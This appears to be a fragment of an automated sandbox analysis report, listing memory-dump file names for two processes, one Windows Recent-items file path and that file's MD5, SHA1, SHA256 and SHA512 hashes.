memory/3092-2-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-0-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-4-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-5-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-7-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-6-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-8-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-9-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-10-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp

memory/3092-11-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-12-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-13-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp

memory/3092-18-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-17-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-16-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-14-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-15-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-38-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-39-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-41-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-43-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-45-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-47-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-46-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp

memory/3092-48-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-52-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-53-0x00007FF69FFD0000-0x00007FF69FFD8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 33ed741e738ffd17972791590e87aa49
SHA1 e9b716cc084e27b359ecf84a8e747c1e6d2d99a6
SHA256 6a4cc7e2807e9a9891c9bda562deef9f9cdca2b8a043c0b9307013e729601156
SHA512 84c0e5fac4ab95a78aa2d929c6be519f8f683b64cd13920d59a31ffff09350f0fbf25cd54544e87bb112b503f3bc7222379ccd4748096eaf8fc8aa91df779126